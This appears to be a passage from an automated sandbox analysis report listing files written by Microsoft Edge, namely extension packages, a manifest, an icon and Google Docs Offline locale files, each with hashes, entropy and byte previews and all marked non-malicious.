                                                                                                                                              SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                              MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                              SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                              SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                              SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11185
                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1753
                                                                                                                                              Entropy (8bit):5.8889033066924155
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                              MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                              SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                              SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                              SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9815
                                                                                                                                              Entropy (8bit):6.1716321262973315
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                              MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                              SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                              SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                              SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):10388
                                                                                                                                              Entropy (8bit):6.174387413738973
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                              MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                              SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                              SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                              SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):962
                                                                                                                                              Entropy (8bit):5.698567446030411
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                              MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                              SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                              SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                              SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11185
                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):154477
                                                                                                                                              Entropy (8bit):7.835886983924039
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                              MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                              SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                              SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                              SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4982
                                                                                                                                              Entropy (8bit):7.929761711048726
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                              MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):908
                                                                                                                                              Entropy (8bit):4.512512697156616
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                              MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1285
                                                                                                                                              Entropy (8bit):4.702209356847184
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                              SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1244
                                                                                                                                              Entropy (8bit):4.5533961615623735
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):977
                                                                                                                                              Entropy (8bit):4.867640976960053
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                              MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3107
                                                                                                                                              Entropy (8bit):3.535189746470889
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                              MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1389
                                                                                                                                              Entropy (8bit):4.561317517930672
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                              MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
